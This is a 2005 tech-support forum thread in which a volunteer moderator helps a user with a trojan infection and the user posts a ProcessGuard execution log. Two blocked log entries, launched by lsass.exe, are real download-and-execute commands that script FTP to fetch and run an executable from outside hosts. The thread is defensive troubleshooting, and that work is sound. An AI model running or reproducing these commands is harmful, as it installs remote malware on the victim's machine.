Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

help i have trojan horse collected.5.L [RESOLVED]


  • This topic is locked This topic is locked

#196
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Not much there.

In ProcessGuard on the Protection Tab you will see applications that have Install Global hooks behing their name in the "Other Options" column.

Can you make a list of these applications and post them?

Regards,
  • 0

Advertisements


#197
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello
sorry it has taken a while to get back to you
4 applications have install global hooks attached to them they are
explorer.exe
ieexplorer.exe
msimn.exe
procguard.exe
hope this is what you are looking for
computer keeps locking up going slow when in use on the internet
Cheers

Edited by duglartis, 19 October 2005 - 01:41 AM.

  • 0

#198
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Can you check this one for spelling errors:
ieexplorer.exe

The name of the real file is iexplore.exe

If the way you spelled it is really the one in the list, proceed as follows:
- Open the Process Guard Protection tab
- Select the application and click "Remove Apllication(s)"
- Then open the Security tab and see if the application is listed there as well
- If so select it and click "Remove Apllication(s)"

Then reboot your computer and see if you can find the file.
I would be very interested in obtaining a copy if it does.

Regards,
  • 0

#199
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
sorry it was a typo from this end the correct name exists iexplore.exe
where to next?
thanks for your help
  • 0

#200
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
In the ProcessGuard folder you will find a subfolder called logs

Can you post as much of the entire log that is next to newest.
As much as will fit into one post.

Guessing it will be called pglog_09_2005.txt

Regards,
  • 0

#201
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
---Process Guard Log Started---
Thu 01 - 18:33:44 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Thu 01 - 18:33:45 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1320]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Thu 01 - 18:33:45 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Thu 01 - 18:33:45 [EXECUTION] "c:\program files\grisoft\avg free\avgw.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1192]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgw.exe" /test=2 ]
Thu 01 - 18:33:47 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Thu 01 - 18:33:47 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Thu 01 - 18:33:48 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Thu 01 - 18:33:48 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Thu 01 - 18:33:48 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Thu 01 - 18:33:48 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Thu 01 - 18:33:48 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1900]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Thu 01 - 18:33:49 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Thu 01 - 18:33:49 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Thu 01 - 18:33:50 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Thu 01 - 18:33:50 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ c:\windows\system32\rundll32.exe fldrclnr.dll,wizard_rundll ]
Thu 01 - 18:33:51 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Thu 01 - 18:33:52 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Thu 01 - 18:33:52 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Thu 01 - 18:33:52 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [220]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Thu 01 - 18:33:53 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Thu 01 - 18:33:55 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Thu 01 - 18:34:31 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds9d9a65830e63144894dc6c329089b226 ]
Thu 01 - 18:34:31 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsa9625f2af054fe46bb11c9f5df72cdab ]
Thu 01 - 18:34:31 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds34aff79d4b0e34498963eb59013c6781 ]
Thu 01 - 18:34:32 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsa87c9ba41bf70c4fbac6ff8db43dd87d ]
Thu 01 - 18:34:57 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Thu 01 - 18:35:59 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1192]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" /sched=5 ]
Thu 01 - 18:37:08 [EXECUTION] "c:\program files\grisoft\avg free\avgw.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avginet.exe" [920]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgw.exe" /update "c:\documents and settings\all users\application data\grisoft\avg7data\avg7upd\install\u-fwd.idx" ]
Thu 01 - 18:41:06 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [492]
[EXECUTION] Commandline - [ cmd /c echo open 202.124.130.5 20554 > i&echo user 1 1 >> i &echo get eraseme_14046.exe >> i &echo quit >> i &ftp -n -s:i &eraseme_14046.exe
]
Thu 01 - 18:51:54 [EXECUTION] "c:\windows\system32\wscript.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ c:\windows\system32\wscript.exe "c:\documents and settings\dug and tania\desktop\regsrch.vbs" ]
Thu 01 - 18:52:14 [EXECUTION] "c:\windows\regedit.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\wscript.exe" [1900]
[EXECUTION] Commandline - [ "c:\windows\regedit.exe" /e /a c:\docume~1\dugand~1\locals~1\temp\regtmp.tmp ]
Thu 01 - 18:53:10 [EXECUTION] "c:\windows\system32\wscript.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ c:\windows\system32\wscript.exe "c:\documents and settings\dug and tania\desktop\regsrch.vbs" ]
Thu 01 - 18:53:22 [EXECUTION] "c:\windows\regedit.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\wscript.exe" [180]
[EXECUTION] Commandline - [ "c:\windows\regedit.exe" /e /a c:\docume~1\dugand~1\locals~1\temp\regtmp.tmp ]
Thu 01 - 19:04:32 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds2d3b728a8f92b0428eeccc917ddb775d ]
Thu 01 - 19:04:32 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsbfe757b031782c4e991d507de846a579 ]
Thu 01 - 19:12:00 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]

---Process Guard Log Started---
Fri 02 - 16:40:13 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Fri 02 - 16:40:13 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1324]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Fri 02 - 16:40:14 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Fri 02 - 16:40:15 [EXECUTION] "c:\program files\grisoft\avg free\avgw.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1172]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgw.exe" /test=2 ]
Fri 02 - 16:40:17 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Fri 02 - 16:40:17 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Fri 02 - 16:40:17 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Fri 02 - 16:40:17 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Fri 02 - 16:40:17 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Fri 02 - 16:40:17 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Fri 02 - 16:40:18 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1880]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Fri 02 - 16:40:18 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Fri 02 - 16:40:19 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Fri 02 - 16:40:19 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Fri 02 - 16:40:20 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Fri 02 - 16:40:20 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Fri 02 - 16:40:20 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Fri 02 - 16:40:21 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Fri 02 - 16:40:22 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [112]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Fri 02 - 16:40:23 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Fri 02 - 16:40:25 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Fri 02 - 16:40:40 [EXECUTION] "c:\program files\outlook express\msimn.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\program files\outlook express\msimn.exe" ]
Fri 02 - 16:40:45 [EXECUTION] "c:\program files\messenger\msmsgs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [652]
[EXECUTION] Commandline - [ "c:\program files\messenger\msmsgs.exe" -embedding ]
Fri 02 - 16:41:00 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds2ee088d2925ec548bfaba68e0093f630 ]
Fri 02 - 16:41:01 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds03bc5f1ba831f944865463390f70b7b4 ]
Fri 02 - 16:41:01 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds4bb27ed39252774b855f8316a978f00b ]
Fri 02 - 16:41:01 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds26ffe7190170e24f94f39e12d5e2e9f9 ]
Fri 02 - 16:41:57 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1172]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" /sched=5 ]
Fri 02 - 16:42:05 [EXECUTION] "c:\program files\grisoft\avg free\avgw.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avginet.exe" [2296]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgw.exe" /update "c:\documents and settings\all users\application data\grisoft\avg7data\avg7upd\install\u-fwd.idx" ]
Fri 02 - 17:11:03 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds6a2c21e8115cbd40b29688a744047aba ]
Fri 02 - 17:11:03 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds9452ad1714ff554f9cbc68d062aa8683 ]
Fri 02 - 18:32:27 [EXECUTION] "c:\windows\system32\defrag.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\defrag.exe" -p 2a4 -s 00000ec4 -b c: ]
Fri 02 - 18:32:27 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds741fc4de26fe7846a71325c3cf4490f3 ]
Fri 02 - 18:32:27 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf49c9513fb8c714c97f061c313d4cbbe ]
Fri 02 - 18:32:38 [EXECUTION] "c:\program files\grisoft\avg free\avgwb.dat" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [1912]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgwb.dat" /switchui ]
Fri 02 - 19:16:38 [EXECUTION] "c:\windows\pchealth\helpctr\binaries\helpsvc.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\pchealth\helpctr\binaries\helpsvc.exe" /embedding ]
Fri 02 - 19:16:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdse322dd4ea69d034095a8ce31cbd8c16a ]
Fri 02 - 19:16:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsd87d725ed55ddf43b2d2a850a348b7e9 ]
Fri 02 - 19:17:15 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Fri 02 - 19:19:05 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Fri 02 - 19:20:26 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [488]
[EXECUTION] Commandline - [ cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dll &echo phr.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &phr.exe
]
Fri 02 - 19:46:35 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" /d shell32.dll,control_rundll desk.cpl ]
Fri 02 - 19:46:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds63b9778dae548549a82735d30a6f329b ]
Fri 02 - 19:46:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsce7988fd05875749b273a58ea28e7fe5 ]
Fri 02 - 19:48:56 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Fri 02 - 20:16:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds100f70ec0af9e4498ceff70d9b58635d ]
Fri 02 - 20:16:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds8f7c487b45a5884da1b8832798a5e40a ]
Fri 02 - 20:32:51 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Fri 02 - 20:46:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsd51c3ca92f283948a37494ed77c331c6 ]
Fri 02 - 20:46:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds87396767371d014dafef6fb7b5223077 ]
Fri 02 - 21:16:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsb05df5bdb085f44aa015be57016a8398 ]
Fri 02 - 21:16:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf514e8f58fd29543bae2eba6a81ffa4d ]
Fri 02 - 21:20:31 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]

---Process Guard Log Started---
Sat 03 - 16:23:21 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Sat 03 - 16:23:21 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1440]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Sat 03 - 16:23:21 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Sat 03 - 16:23:21 [EXECUTION] "c:\program files\grisoft\avg free\avgw.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1044]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgw.exe" /test=2 ]
Sat 03 - 16:23:24 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Sat 03 - 16:23:24 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Sat 03 - 16:23:25 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Sat 03 - 16:23:25 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Sat 03 - 16:23:26 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Sat 03 - 16:23:26 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1948]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Sat 03 - 16:23:26 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Sat 03 - 16:23:27 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Sat 03 - 16:23:27 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Sat 03 - 16:23:28 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
